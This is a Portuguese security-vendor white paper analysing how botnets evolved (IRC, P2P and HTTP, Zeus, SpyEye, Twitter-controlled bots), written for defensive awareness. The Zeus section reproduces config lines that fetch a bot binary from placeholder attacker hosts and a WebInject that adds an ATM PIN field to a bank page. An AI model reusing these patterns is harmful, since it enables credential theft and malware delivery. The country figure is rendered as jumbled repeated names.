A nova era das redes de bots
Transcrição
A nova era das redes de bots
White Paper A nova era das redes de bots Por Zheng Bu, Pedro Bueno, Rahul Kashyap e Adam Wosotowsky McAfee Labs™ White Paper A nova era das redes de bots Sumário Uma indústria se desenvolve 3 Evolução 4 Bots de IRC 4 Bots locais 4 Bots P2P 4 Bots HTTP 5 Spy Eye 7 Predomínio global 8 Classificação das redes de bots: Principais ameaças por país 9 O papel dos governos 10 Quem está em risco? 11 Uma perspectiva do futuro 11 Uma nova era de zumbis sociais? 12 Quanto mais oculto, melhor 13 Combate através da Global Threat Intelligence 14 Referências 14 Sobre o McAfee Labs™ 14 Sobre a McAfee 14 White Paper A nova era das redes de bots As redes de bots (robôs), popularmente conhecidas como “botnets”, têm uma história variada. Um bot é, basicamente, uma série de scripts ou comandos, ou um programa desenvolvido para se conectar a algo (normalmente um servidor) e executar um comando ou uma série de comandos. Essencialmente, ele desempenha várias funções. Ele não precisa ser malicioso ou nocivo. Os bots e seus usos evoluíram de simples observadores de canais ou jogos (por exemplo, os bots Bartender de Wisner e Game Manager de Lindahl) para fornecedores de serviços especializados, como gerenciamento de bancos de dados ou manutenção de listas de acesso. Este relatório aborda um uso muito diferente: O “arrebanhamento” de bots (também chamados de “drones” ou zumbis) por cibercriminosos para apoiar suas atividades criminosas. Como afetam corporações, essas atividades criminosas podem incluir roubo de segredos comerciais, inserção de malware em arquivos de código-fonte, interrupção de acesso ou de serviços, comprometimento da integridade dos dados e roubo de informações de identidade de funcionários. Os resultados para uma empresa podem ser desastrosos e provocar perda de lucros, de conformidade regulatória, da confiança dos clientes, de reputação e até da própria empresa. Para organizações governamentais, as preocupações vão ainda mais longe. Veremos como os bots criminosos evoluíram, a indústria que apoia sua criação e distribuição e como eles são utilizados atualmente por vários grupos cibercriminosos. Também sugerimos o rumo que os bots tomarão no futuro próximo. Uma indústria se desenvolve A indústria das redes de bots apresentou uma espécie de “curva de crescimento” (embora não no bom sentido). Nos primeiros anos deste século, os bots e as redes de bots eram criados por programadores com um bom conhecimento de redes e protocolos, como o Internet Relay Chat (IRC). A utilização do IRC deu início à tendência em direção ao comando e controle centralizado, frequentemente conhecido como C&C. O SDBot, um dos primeiros e mais conhecidos bots, foi codificado em C++. (O SDBot teve grande propagação porque seu autor publicou o código-fonte — uma prática muito incomum.) Versões posteriores do SDBot, também conhecidas como SpyBot, começaram a explorar vulnerabilidades de chamadas a procedimentos remotos da Microsoft; portanto, seus programadores precisavam do conhecimento de como codificar explorações para criar tais bots. Nessa época, os bots e redes de bots vicejavam explorando múltiplas vulnerabilidades que estavam amplamente disponíveis nas plataformas Microsoft Windows mais comuns. Os bots que surgiram posteriormente, na última década, acumularam as capacidades de lançar ataques de negação de serviço (DoS), fazer varredura de portas e registrar pressionamentos de teclas, entre outras funções. Os autores desses malwares precisavam conhecer linguagem assembly, além de bons fundamentos em redes. O RBot (2003) foi um dos primeiros a usar esquemas/compactadores de compressão e criptografia, como UPX, Morphine e ASPack. Essas exigências introduziram um novo nível de codificadores habilidosos que compreendiam esquemas de criptografia e como empregar técnicas de evasão ao criar seus binários. A essa altura, não havia mais retorno. O sucesso do RBot abriu caminho para a ampla aceitação da criptografia e da ocultação em bots e redes de bots. Um dos principais desenvolvimentos no controle de redes de bots foi o uso de redes ponto a ponto (“peer-to-peer” ou P2P) para comunicação pelo Sinit (2003) e pelo Phatbot (2004). Essa manobra mudou completamente a equação da comunicação das redes de bots. Uma das redes de bots mais sofisticadas com base em P2P surgidas posteriormente foi a Storm Worm/Nuwar (2007), que utilizava uma arquitetura P2P descentralizada e que foi, por algum tempo, excepcionalmente difícil de combater. A necessidade de sofisticação na tecnologia das redes de bots é impulsionada pelas várias soluções de segurança do mercado que combatem esses desafios. A sofisticação dos próprios bots e redes de bots também obriga as tecnologias de segurança a evoluir, criando um relacionamento medida-contramedida muito complexo entre os criadores de malware e os fornecedores de segurança. É evidente que os bots e as redes de bots aumentaram muito em complexidade. Os programadores desse tipo de malware precisam de um nível avançado de conhecimento de redes, sistemas e criptografia. Considerando-se o volume e o nível de sofisticação das redes de bots, é altamente provável que elas sejam criadas, não por um pequeno grupo de pessoas, mas por uma agremiação de indivíduos altamente motivados pelo retorno financeiro de sua empreitada. A motivação é óbvia: subverter e comprometer empreendimentos e roubar dados que tenham valor monetário. 3 White Paper A nova era das redes de bots Evolução Bots de IRC Os primeiros bots nem sempre eram maliciosos. Porém, isso é bem menos comum atualmente, especialmente nos últimos seis anos, desde a explosão das redes de bots por volta de 2004. Antes disso, a maioria dos bots utilizava o IRC como protocolo de controle. O IRC foi utilizado pela primeira vez para conexão a salas de bate-papo, as quais permitiam às pessoas trocar mensagens, o que era muito comum de 10 a 15 anos atrás. No entanto, com o advento dos protocolos de mensagens instantâneas, como ICQ, AIM e MSN Messenger, o IRC perdeu um pouco de sua popularidade, mas ainda é utilizado por muitos profissionais de rede e de segurança da “velha-guarda”. Os primeiros bots foram criados para se registrarem nessas salas de bate-papo (frequentemente chamadas de canais), assegurar que o canal permanecesse aberto, reconhecer os operadores do canal e dar a eles o controle sobre o canal. A estratégia mais comum consistia em criar bots que pudessem fazer varredura de uma rede e tirar proveito de máquinas que contivessem vulnerabilidades antigas ou novas. Uma vez comprometida uma máquina, o bot poderia conectar-se a uma sala de bate-papo (canal) específica e receber instruções do mestre de bots, como iniciar um ataque DoS contra um site. Esse comportamento ainda se vê atualmente, como no recente ataque W32/Vulcanbot contra sites de ativistas de direitos humanos. Outras funções de IRC comuns são capturar imagens de tela do host, fazer download ou atualizar um bot, etc. Alguns bots podem executar mais de 100 comandos. Observamos um número enorme de novos bots em 2004 devido ao lançamento de vários aplicativos de interface gráfica que permitiam aos hackers criar bots apenas apontando e clicando. Essa simplicidade foi um avanço significativo para cibercriminosos e criadores de malware: pessoas que não sabiam desenvolver programas e que tinham pouco conhecimento sobre protocolos de rede e sistemas operacionais passaram a poder criar uma ampla variedade de bots simplesmente clicando com um mouse. Bots locais Os bots funcionam quase que exclusivamente em versões do Windows, mas versões locais também surgiram. Utilizando a linguagem de script Perl, hackers criaram versões executadas em diversas variantes de Unix e Linux. Os criadores foram o grupo brasileiro de hackers Atrix-Team — na ocasião, uma mera agremiação de escritores de scripts. Devido ao formato “aberto”, ainda se veem muitas dessas versões atualmente. Bots P2P Redes de bots IRC da “velha-guarda” ainda são comuns, mas têm uma vulnerabilidade intrínseca: o servidor IRC. Quando o servidor é tirado do ar, o hacker perde o controle sobre o exército de bots. Em 2007 surgiu um novo tipo de rede de bots utilizando o protocolo P2P. Trata-se do mesmo protocolo que muitos programas utilizam, por exemplo, para fazer download de músicas. Uma dessas redes de bots utilizava uma implementação de criptografia com base no protocolo eDonkey. Esse malware ganhou uma notoriedade considerável: Originalmente chamava-se W32/Nuwar, mas depois ficou famoso como worm Storm. O Storm continha aproximadamente 100 pontos pré-gravados como valores hash, os quais o malware descriptografava e utilizava para verificar se havia novos arquivos para baixar. Todas as transações eram criptografadas, portanto, apenas o próprio malware podia descriptografar e reagir à resposta. As respostas geralmente levavam a URLs que faziam download de outros binários. O Storm foi responsável pela grande maioria do spam durante os anos de 2007 e 2008, até ser tirado do ar. A vantagem da abordagem P2P é sua estrutura de controle distribuída e resistente, o que a torna mais difícil de derrubar do que uma rede de bots controlada por IRC. No entanto, esse tipo é mais difícil de manter e disseminar devido à sua complexidade. Ainda no final de abril, vimos mais um malware que compartilhava partes do mesmo código — responsável por envio de spam e ataques DoS — que o Storm. 4 White Paper A nova era das redes de bots Bots HTTP Dois ou três anos atrás, vimos uma mudança no controle de muitas redes de bots, de canais IRC para sites, utilizando HTTP. Essa mudança para um protocolo comum foi uma manobra inteligente por parte dos cibercriminosos e criadores de malware. A evolução para HTTP começou com avanços em “kits de exploração”. Esses kits, desenvolvidos principalmente por cibercriminosos russos, incluem Mpack, ICEPack e Fiesta. Eles podem instalar software em máquinas remotas e controlá-las a partir de um site remoto. O cibercriminoso envia spam ou uma mensagem instantânea com uma variedade de links para vítimas potenciais. Esses links levam a um site com o kit de exploração instalado. Uma vez lá, o kit determina qual exploração utilizar, dependendo do país, versão do sistema operacional, versão do navegador e até múltiplas versões de aplicativos clientes instalados na máquina da vítima. Tudo isso ocorre dinamicamente e sem o conhecimento da vítima. Se a exploração for bem-sucedida, ela pode instalar posteriormente um coquetel de malwares para obter controle remoto sobre a máquina infectada. De todas as atuais redes de bots HTTP, um caso muito especial é a Zeus (também conhecida como Zbot), especializada em roubar credenciais bancárias. A rede Zeus consiste em um elemento cliente e um elemento servidor. O servidor possui um construtor que ajuda o mestre de bots a criar uma variante cliente do malware PWS-ZBot (sua identificação técnica), a qual infecta uma máquina, tornando-a parte da rede de bots ao conectá-la a um site remoto que hospeda o servidor Zeus. Zeus segue uma tendência interessante: tornar fácil para qualquer um criar uma versão personalizada do malware. O kit de ferramentas Zeus é bem caro para ser comprado, mas seu autor adotou amplas medidas para assegurar que a ferramenta seja fácil de usar, o que também facilita sua venda para muitas pessoas, aumentando assim os lucros do autor. O exemplo seguinte mostra o Zeus Builder na versão 1.2.x: O painel esquerdo contém apenas duas opções: “Information” (informação) e “Builder” (construtor). Selecionar “Information” permite saber se a máquina está infectada com o Zeus. Selecionar “Builder” ajuda a pessoa que controla o kit de ferramentas a construir um novo bot. O kit utiliza dois arquivos de entrada: Config e WebInjects. Embora o construtor tenha um botão para editar o arquivo Config, o botão é apenas um atalho. Nós utilizamos o Bloco de Notas para editar o arquivo. O arquivo Config contém os parâmetros que o bot seguirá. 5 White Paper A nova era das redes de bots Exemplos de Config: … url_config “http://www.[EndereçoIPdosMalfeitores].cn/cp/config.bin” url_compip “http://www.[EndereçoIPdosMalfeitores].com/” 2048 encryption_key “12345654321” ;blacklist_languages 1049 end entry “DynamicConfig” url_loader “http://www.[EndereçoIPdeOutroMalfeitor].cn/cp/bot.exe” … Esse trecho de Config diz ao bot onde ele deve ir para fazer download do arquivo de configuração e do próprio bot. Essas etapas asseguram que os controladores de bots possam atualizar seus bots e configurações com novos recursos e novos alvos a qualquer momento. As medidas também permitem que os mestres de bots distribuam o arquivo de configuração e o binário do bot para servidores diferentes, incorporando a capacidade de recuperação proporcionada pela arquitetura distribuída. O segundo arquivo para construção do bot é o WebInject. Esse arquivo especifica os alvos, ou seja, as vítimas das quais o criador do malware ou o dono do kit de ferramentas deseja arrancar informações. O Zeus tem a capacidade de não apenas arrancar informações da página da Web original, mas também de inserir campos adicionais. Portanto, ele pode conseguir até mais informações, se o dono do kit de ferramentas o desejar. Exemplo de WebInject: … set_url https://www.[GrandeVítimaBancária].com/* G data_before <span class=”mozcloak”><input type=”password”*/></span> data_end data_inject <br><strong><label for=”atmpin”>ATM PIN</label>:</strong> <br /> <span class=”mozcloak”><input type=”password” accesskey=”A” id=”atmpin” name=”USpass” size=”13” maxlength=”14” style=”width:147px” tabindex=”2” /></span> data_end data_after data_end … Esse código obtém as informações no URL de destino, o qual, neste exemplo, é de um banco. Além de roubar o nome de usuário e a senha, o Zeus injeta um outro campo para o número PIN do caixa eletrônico. 6 White Paper A nova era das redes de bots Como tende a acontecer com qualquer malware bem-sucedido, o Zeus gerou várias versões do construtor adulteradas por hackers. Muitas até vêm com “backdoors” próprios. Que ironia! Uma versão adulterada aparece na imagem de tela seguinte: Essa versão, chamada MultiBuilder, criou duas variantes com base na versão 1.3 do Zeus. Recentemente vimos o Zeus pular da versão 1.3 para a 2.0, a qual agora contém um modelo de licença bem rigoroso. O Zeus é efetivamente vinculado à máquina física do comprador utilizando uma licença de software comercial! O canal de criação e distribuição desse malware demonstra um forte tino comercial! Spy Eye Spy Eye é mais um exemplo de um bot HTTP complexo. Ele tem várias semelhanças com o Zeus, principalmente por também ser um capturador de formulários e por sua impressionante arquitetura de controle. Como o Zeus, o Spy Eye tem seu próprio construtor gráfico: 7 White Paper A nova era das redes de bots Um recurso interessante do Spy Eye é sua capacidade de “eliminar” (remover) o Zeus da máquina que ele infecta, criando um conflito interessante dentro do mundo dos criadores de malware. Não é a primeira vez que vemos criadores de malware brigarem entre si. Para evitar análises feitas por seus alvos, tanto o Zeus quanto o Spy Eye oferecem a opção de utilizar uma chave de criptografia durante o processo de construção dos bots. Nas primeiras versões do Zeus, essa chave era predefinida, o que dava às forças de segurança uma maneira muito mais rápida de analisar e descobrir os alvos do malware. Com esse novo recurso, os malfeitores certamente levaram a briga a um outro nível. Predomínio global Distribuição geral de redes de bots por país Índia Brasil Rússia Alemanha Estados Unidos Grã-Bretanha Colômbia Indonésia Itália Espanha Argentina Polônia Paquistão Portugal Vietnã Coréia do Sul Grécia China Belarus Austrália Outros Figura 1: O McAfee Labs detectou mais infecções por redes de bots na Índia do que em qualquer outro país — quase 1,5 milhão. Brasil, Rússia e Alemanha também excederam um milhão de infecções detectadas. 8 White Paper A nova era das redes de bots Classificação das redes de bots: Principais ameaças por país Alemanha Asprox Argentina Belarus Asprox Bagle-CB Bagle-CB Bobax Bobax Bobax Bobax Cimbot Cimbot Cimbot Cimbot Cutwail Cutwail Cutwail Cutwail Cutwail2 Cutwail2 Cutwail2 Cutwail2 DarkMailer DarkMailer DarkMailer DarkMailer Dlena Dlena Dlena Dlena Donbot Donbot Donbot Donbot Festi Festi Festi Festi Gheg Gheg Gheg Gheg Grum Grum Grum Grum Grum2 Grum2 Grum2 HelloGirl HelloGirl HelloGirl Lethic Lethic Lethic Maazben Maazben Maazben Mega-D Mega-D Netsky Netsky Outros Outros RK1 RK1 RK2 RK2 HelloGirl Lethic Maazben Mega-D Netsky Outros RK1 RK2 Asprox China RK2 Reposin Rustock Asprox Storm TwitGenPhish Xarvester Xarvester Xarvester RK1 TwitGenPhish TwitGenPhish TwitGenPhish Outros Storm Storm Storm Netsky Rustock Rustock Rustock Mega-D Reposin Reposin Reposin Colômbia Asprox Xarvester Coréia do Sul Asprox Bagle-CB Bagle-CB Bagle-CB Bagle-CB Bobax Bobax Bobax Bobax Cimbot Cimbot Cimbot Cimbot Cutwail Cutwail Cutwail Cutwail Cutwail2 Cutwail2 Cutwail2 Cutwail2 DarkMailer DarkMailer DarkMailer DarkMailer Dlena Dlena Dlena Donbot Donbot Donbot Festi Festi Festi Gheg Gheg Gheg Grum Grum Grum Grum2 Grum2 Grum2 HelloGirl HelloGirl HelloGirl Lethic Lethic Lethic Maazben Maazben Maazben Mega-D Mega-D Mega-D Netsky Netsky Netsky Outros Outros Outros RK1 RK1 RK1 Reposin RK2 RK2 RK2 Rustock Reposin Reposin Storm Rustock Rustock TwitGenPhish Storm Storm Xarvester TwitGenPhish TwitGenPhish Xarvester Xarvester Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Outros RK1 RK2 Espanha Asprox Bagle-CB Grum2 Brasil Austrália Asprox Bagle-CB Asprox Estados Unidos Asprox Grã-Bretanha Asprox Reposin Rustock Storm TwitGenPhish Xarvester Grécia Asprox Bagle-CB Bagle-CB Bagle-CB Bagle-CB Bobax Bobax Bobax Bobax Cimbot Cimbot Cimbot Cimbot Cutwail Cutwail Cutwail Cutwail Cutwail2 Cutwail2 Cutwail2 Cutwail2 DarkMailer DarkMailer DarkMailer DarkMailer Dlena Dlena Dlena Donbot Donbot Donbot Festi Festi Festi Gheg Gheg Gheg Grum Grum Grum Grum2 Grum2 Grum2 HelloGirl HelloGirl HelloGirl Lethic Lethic Lethic Maazben Maazben Maazben Mega-D Mega-D Mega-D Netsky Netsky Netsky Outros Outros Outros RK1 RK1 RK1 RK2 RK2 RK2 Reposin Reposin Reposin Rustock Rustock Storm Storm TwitGenPhish TwitGenPhish Xarvester Xarvester Rustock Storm TwitGenPhish Xarvester Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Outros RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester 9 White Paper Índia Asprox Indonésia Asprox Itália Asprox Paquistão Asprox Bagle-CB Bagle-CB Bagle-CB Bagle-CB Bobax Bobax Bobax Bobax Cimbot Cimbot Cimbot Cimbot Cutwail Cutwail Cutwail Cutwail Cutwail2 Cutwail2 Cutwail2 Cutwail2 DarkMailer DarkMailer DarkMailer DarkMailer Dlena Dlena Dlena Dlena Donbot Donbot Donbot Donbot Festi Festi Festi Festi Gheg Gheg Gheg Gheg Grum Grum Grum Grum Grum2 Grum2 Grum2 Grum2 HelloGirl HelloGirl HelloGirl HelloGirl Lethic Lethic Lethic Lethic Maazben Maazben Maazben Maazben Mega-D Mega-D Mega-D Mega-D Netsky Netsky Netsky Outros Outros Outros RK1 RK1 RK1 RK2 RK2 Reposin Reposin Rustock Rustock Storm Storm TwitGenPhish TwitGenPhish Xarvester Xarvester RK2 Reposin Rustock Storm TwitGenPhish Xarvester Polônia A nova era das redes de bots Asprox Portugal Asprox Rússia Asprox Netsky Outros RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester Vietnã Asprox Bagle-CB Bagle-CB Bagle-CB Bagle-CB Bobax Bobax Bobax Bobax Cimbot Cimbot Cimbot Cimbot Cutwail Cutwail Cutwail Cutwail Cutwail2 Cutwail2 Cutwail2 Cutwail2 DarkMailer DarkMailer DarkMailer DarkMailer Dlena Dlena Dlena Dlena Donbot Donbot Donbot Donbot Festi Festi Festi Festi Gheg Gheg Gheg Gheg Grum Grum Grum Grum Grum2 Grum2 Grum2 Grum2 HelloGirl HelloGirl HelloGirl HelloGirl Lethic Lethic Lethic Lethic Maazben Maazben Maazben Maazben Mega-D Mega-D Mega-D Mega-D Netsky Netsky Netsky Netsky Outros Outros Outros Outros RK1 RK1 RK1 RK1 RK2 RK2 RK2 RK2 Reposin Reposin Reposin Reposin Rustock Rustock Rustock Rustock Storm Storm Storm Storm TwitGenPhish TwitGenPhish TwitGenPhish TwitGenPhish Xarvester Xarvester Xarvester Xarvester Figura 2: As maiores redes de bots, por país. Rustock é, disparada, a rede de bots mais “popular” do mundo. O papel dos governos À medida que crescer a ameaça da guerra cibernética e aumentar o dano que ela pode causar, provavelmente veremos as redes de bots serem utilizadas como armas em conflitos futuros. Elas podem já ter sido empregadas. Em nosso mundo cada vez mais tecnológico, comunicações eficazes são de suma importância na administração de qualquer crise. A organização de recursos e sua mobilização para enfrentar eventos de causas naturais ou humanas dependem muito da Internet, uma ferramenta essencial para disseminação de informações para uma gama de partes interessadas e para coordenação de suas reações. A degradação ou interrupção desse fluxo de informações pode tornar um evento ruim ainda pior. A Internet pode se tornar mais um campo de batalha. Eventos como o recente derramamento de óleo no Golfo do México, as explosões na Europa e no Iraque ou as escaramuças navais entre os coreanos podem ser afetados por interrupções intencionais dos canais de notícias ou das equipes de resposta a emergências, os quais dependem da Internet. Redes de bots podem ser compradas ou alugadas no mercado negro e podem até ser tomadas de seus donos e redirecionadas para novos propósitos. Sabemos que tais coisas acontecem regularmente, portanto, seria ingenuidade não esperar que organizações governamentais ou países de todo o mundo tenham se envolvido na aquisição de capacidades de redes de bots para necessidades ofensivas e contra-ofensivas. Uma entidade cívica ou nacional tem bons motivos para capturar uma rede de bots de seus mestres atuais. As redes de bots infiltram corporações, indivíduos e escritórios governamentais, bem como estações de trabalho militares. É da maior importância que os direitos intelectuais e de privacidade dos cidadãos e instituições do mundo todo sejam protegidos daqueles que os utilizariam ilegalmente. Assumir o controle de uma rede de bots obriga o novo controlador a escolher uma estratégia: (a) derrubar o sistema, 10 White Paper A nova era das redes de bots o que poderia incapacitar as máquinas que fazem parte da rede de bots, prejudicar significativamente a infraestrutura e, possivelmente, tornar o novo mestre responsável pelos danos causados; (b) deixar a rede de bots ociosa até que todos os nós infectados sejam atualizados e não estejam mais sob controle ou (c) monitorar a rede de bots para identificar e capturar o mestre de bots. Cada uma dessas etapas é controversa. Quem está em risco? Todos os usuários de computador correm risco porque todos navegam na mesma Internet. Existe apenas um punhado de maneiras pelas quais os cibercriminosos podem infectar um host ou rede com seus bots (ou com qualquer forma de software malicioso). Essas maneiras normalmente envolvem alguma forma de engenharia social, a qual pode ser definida como “hackear” a mente humana. Os atacantes utilizam um plano ou isca para induzir os usuários de computador a clicar em um link ou instalar um programa, o que, em condições normais, eles não fariam. Uma das técnicas mais inteligentes e predominantes de hoje em dia é a utilização, pelos cibercriminosos, de notícias de grande repercussão como isca em seus esquemas. Os cibercriminosos leem as mesmas histórias que nós e sabem quantas pessoas recebem suas notícias via on-line. Seja um link supostamente de um vídeo de um desastre atual ou o drama de alguma celebridade popular, esses estratagemas atraem os usuários como abelhas ao mel. Com seu conhecimento sobre o comportamento humano e sobre o que os usuários procuram on-line, esses atacantes bem poderiam ensinar alguns truques a “marqueteiros” profissionais. Precisamos ficar cientes dos riscos da navegação e utilização de tecnologias Web 2.0 porque os cibercriminosos usam as notícias contra nós. Todo indivíduo precisa se precaver contra ataques em redes sociais, mas as empresas e os governos sofrem os danos mais pesados com os ataques de redes de bots. Algumas das ameaças para as empresas são: Fraude de cliques: visitar páginas da Web e clicar automaticamente em “banners” de anúncios para roubar grandes somas de dinheiro das empresas de anúncios on-line. • Ataques de negação de serviço distribuído (DDoS): saturação da largura de banda para impedir o tráfego legítimo. Esses ataques são frequentemente realizados por concorrentes, clientes insatisfeitos ou com objetivos políticos. • Infiltração de sistemas de arquivos: acesso a sistemas críticos para roubar dados de clientes, informações particulares de funcionários, segredos comerciais, finanças corporativas, etc. • Desativação da segurança existente: ato de evitar iniciativas de limpeza ou sequestro por donos de bots rivais. • Spams: utilização de recursos e largura de banda de outros sistemas para enviar volumes imensos de spam. • Infecção de código-fonte: envenenamento de toda a árvore do código-fonte através da inserção de alterações não autorizadas e indetectáveis ou da descoberta de vulnerabilidades adicionais para explorar. • Os resultados desses ataques podem ser bastante graves, custando às empresas uma quantidade significativa de tempo e mão-de-obra para limpar. Além disso, as empresas podem ter revogado seu status de conformidade regulatória ou industrial. Responsabilidades jurídicas também são prováveis em relação a clientes, funcionários e outros afetados pelas medidas de segurança inadequadas de uma empresa. Para governos e proprietários de infraestruturas críticas, os danos causados por redes de bots podem ser ainda mais amplos: • Ataques DoS podem interromper comunicações durante uma crise. Infecções de código-fonte podem causar a paralisação de redes críticas. • Sistemas críticos de acesso podem fornecer informações militares aos inimigos. • Uma perspectiva do futuro Nos últimos seis anos, as redes de bots tornaram-se uma das maiores ameaças, não apenas para profissionais de cibersegurança, mas também para usuários corporativos e consumidores — praticamente qualquer um que tenha um computador. As redes de bots tornaram-se a infraestrutura mais essencial utilizada por cibercriminosos e governos para lançar quase todo tipo de ataque cibernético: espionagem, roubo ou vazamento de dados, spam e ataques de negação de serviço distribuído. O McAfee Labs já percebeu uma tendência significativa em direção a uma infraestrutura de rede de bots mais resistente e mais distribuída — contando com tecnologias robustas, como P2P, controle com base na Web e serviços Web 2.0, bem como técnicas de evasão e redundância. 11 White Paper A nova era das redes de bots Uma nova era de zumbis sociais? Conforme os serviços Web 2.0 evoluem, o mesmo acontece com os criadores das redes de bots, que rapidamente adotam novas tecnologias para aumentar a sofisticação de seus ataques. Quando este documento estava sendo redigido, KeriosC2 era uma ferramenta conceitual para demonstrar que LinkedIn, Twitter e TinyURL podem ser utilizados para controlar uma rede de bots. Usuários de computador do mundo inteiro desfrutam da engenharia social, e agora, as redes de bots também. Isso não é um bom desdobramento. Com a tendência das redes de bots de funcionar por cima de aplicativos e protocolos comuns, suas comunicações serão um desafio maior do que nunca para se detectar e prever. Um desdobramento adicional ocorreu em maio, quando alguns bots começaram a usar o Twitter para receber comandos. Por enquanto, a funcionalidade é bastante simples: apenas um monitoramento (ou “seguimento”) de uma conta do Twitter para receber comandos. Como você pode ver na tela seguinte, o construtor com interface gráfica é bastante simples. Ao contrário do Zeus ou do Spy Eye, bem mais complexos, essa forma não contém opção alguma, apenas um campo para se digitar um nome de usuário do Twitter, o qual o bot seguirá para receber comandos. Durante a redação deste documento, a sintaxe e a estrutura dos comandos também eram básicas: .VISIT: Para abrir uma página específica .DOWNLOAD: Para fazer download de um arquivo de um local remoto .DDOS: Para causar uma negação de serviço em uma vítima 12 White Paper A nova era das redes de bots Quanto mais oculto, melhor Os criadores de redes de bots adotaram muitas abordagens para evitar detecções por dispositivos ou softwares de segurança. No que se refere ao processo, os criadores de malware costumam testar seu malware com a maioria dos produtos dos principais fornecedores de segurança para assegurar que haja pouca ou nenhuma detecção. Como resultado, os cibercriminosos e criadores de malware frequentemente anunciam seu malware como “à prova de detecção”. O cumprimento de políticas com base em IP ou listas de controle de acesso pode ser um controle eficaz contra conexões originárias de um bot para seus servidores de controle. Os criadores de malware e redes de bots reagiram a esse contra-ataque implementando algoritmos de fluxo em vez de utilizar listas de IP predefinidas para seus servidores de comando. O Zeus utiliza essa técnica para gerar domínios na hora. Essa etapa pode, efetivamente, inviabilizar os vários mecanismos tradicionais de detecção com base em listas negras. Os malfeitores desenvolveram muitas técnicas de evasão para downloads inadvertidos evadirem inspeções por dispositivos de segurança de rede. Um bom exemplo é a manipulação de extensões de arquivo demonstrada pelo construtor Gh0st RAT. (Veja a tela seguinte). A Operação Aurora e outras novas ameaças de malware utilizaram truques semelhantes. Vimos muitos outros tipos de evasão — de simples codificação a criptografia (até mesmo operações XOR no binário) — no empenho dos criadores de malware de conseguir instalar seu software na máquina da vítima. Nos últimos anos, várias redes de bots grandes foram tiradas do ar. Para evitar esses êxitos da segurança e tornar a infraestrutura de suas redes de bots mais forte e mais resistente, os mestres de bots começaram a introduzir técnicas novas. Já vimos técnicas de fluxo para aumentar a capacidade de recuperação dos servidores de controle. O protocolo P2P, embora de suporte e implementação caros, foi utilizado em um bom número de redes de bots ocultas, como Storm e Nugache. Protocolos da Web, criptografados ou não, são amplamente utilizados como alternativa de comando ao protocolo IRC, mais frequentemente utilizado, principalmente porque essas portas Web são quase universalmente permitidas por firewalls, mesmo em redes corporativas rigidamente controladas. O McAfee Labs prevê que tanto cibercriminosos quanto criadores de redes de bots continuem a ir além dos limites das tecnologias Web 2.0. Alguns outros avanços que prevemos: • Acesso e funcionalidade com vários navegadores, muito além de Internet Explorer e Firefox. Maior integração incorporada com tecnologias de mensagens instantâneas, como JabberZeuS, para proporcionar acesso rápido a dados bancários e outros. • Integração adicional com outros malwares, como Bredolad e Pushdo, para assegurar um maior predomínio global em sistemas. • 13 White Paper A nova era das redes de bots Combate através da Global Threat Intelligence Como as ameaças cibernéticas crescem exponencialmente enquanto se tornam cada vez mais sofisticadas, os profissionais de segurança precisam de uma abordagem diferente para detectar e frustrar os ataques. No passado, bastava uma estratégia de defesa em profundidade — camadas de tecnologias semelhantes. A abordagem atual, porém, precisa cotejar informações de ameaças correlacionadas do mundo todo e entre todos os vetores de ameaças. Essa inteligência precisa ser fornecida a uma ampla gama de produtos de segurança, permitindo que esses produtos cumpram políticas locais com base na atividade de ameaças mais recente e compartilhem informações para que toda a infraestrutura de segurança funcione harmoniosamente. A McAfee está escrevendo o próximo capítulo da defesa em profundidade com a Global Threat Intelligence, nosso mecanismo “in the cloud” (computação na nuvem) que coleta e correlaciona dados de ameaças de todos os vetores de ameaças, constrói um modelo completo de ameaças e proporciona proteção no mercado através de uma suíte completa de produtos de segurança. Nossa capacidade “in the cloud” (computação na nuvem) funciona em conjunto com os mecanismos de cumprimento com base em políticas e mecanismos locais dos produtos McAfee para proporcionar a proteção mais robusta e abrangente contra ameaças do mercado. Nossos clientes se beneficiam de produtos de segurança da McAfee que não apenas compartilham inteligência, mas que o fazem de uma maneira significativa e contextualizada em seu papel e posicionamento na rede. Referências Made, Trends Observed” (Progresso feito, tendências observadas), Microsoft Antimalware Team. http://download.microsoft.com/download/5/6/d/56d20350-afc8-4051-a0df-677b28298912/ msrt%20-%20progress%20made%20lessons%20learned.pdf • SecureWorks. http://www.secureworks.com/ • Documentos técnicos do McAfee Labs. http://www.mcafee.com/us/threat_center/white_paper.html • “Progress Sobre o McAfee Labs™ McAfee Labs é o grupo de pesquisa global da McAfee, Inc. Com a única organização de pesquisa dedicada a todos os vetores de ataque — malware, Web, e-mail, redes e vulnerabilidades — o McAfee Labs reúne informações de seus milhões de sensores e de suas tecnologias de reputação com base em “cloud computing”, como McAfee Artemis™ e McAfee TrustedSource™. Os 350 pesquisadores multidisciplinares do McAfee Labs em 30 países acompanham toda a gama de ameaças em tempo real, identificando vulnerabilidades em aplicativos, analisando e correlacionando riscos e permitindo uma remediação instantânea para proteger as empresas e o público. Sobre a McAfee A McAfee, Inc., sediada em Santa Clara, Califórnia, é a maior empresa do mundo dedicada à tecnologia de segurança. Totalmente comprometida em combater os rigorosos desafios de segurança globais, a McAfee provê soluções proativas e com qualidade comprovada e serviços que ajudam a manter sistemas e redes protegidos mundialmente, permitindo aos usuários conectarem-se à Internet, navegarem e realizarem compras pela Web com segurança. Apoiada por uma equipe de pesquisas premiada, a McAfee desenvolve produtos inovadores que capacitam os usuários domésticos, as empresas dos setores público e privado e os provedores de serviços, permitindo-lhes manter a conformidade com as regulamentações de mercado, proteger dados, prevenir interrupções, identificar vulnerabilidades e monitorar continuamente, além de incrementar a segurança em TI. www.mcafee.com.br. As informações deste documento são fornecidas somente para fins educacionais e para conveniência dos clientes da McAfee. As informações aqui contidas estão sujeitas a alterações sem notificação, sendo fornecidas “no estado”, sem garantia de qualquer espécie quanto à precisão e aplicabilidade das informações a qualquer circunstância ou situação específica. McAfee do Brasil Comércio de Software Ltda. Av. das Nações Unidas, 8.501 - 16° andar CEP 05425-070 - São Paulo - SP - Brasil Telefone: +55 (11) 3711-8200 Fax: +55 (11) 3711-8286 www.mcafee.com.br McAfee e o logotipo McAfee são marcas registradas ou marcas comerciais da McAfee, Inc. e/ou de suas subsidiárias nos Estados Unidos e em outros países. Os outros nomes e marcas podem ser propriedade de terceiros. Os planos, especificações e descrições de produtos aqui contidos são fornecidos apenas com fins informativos e estão sujeitos a alterações sem notificação prévia. Eles são 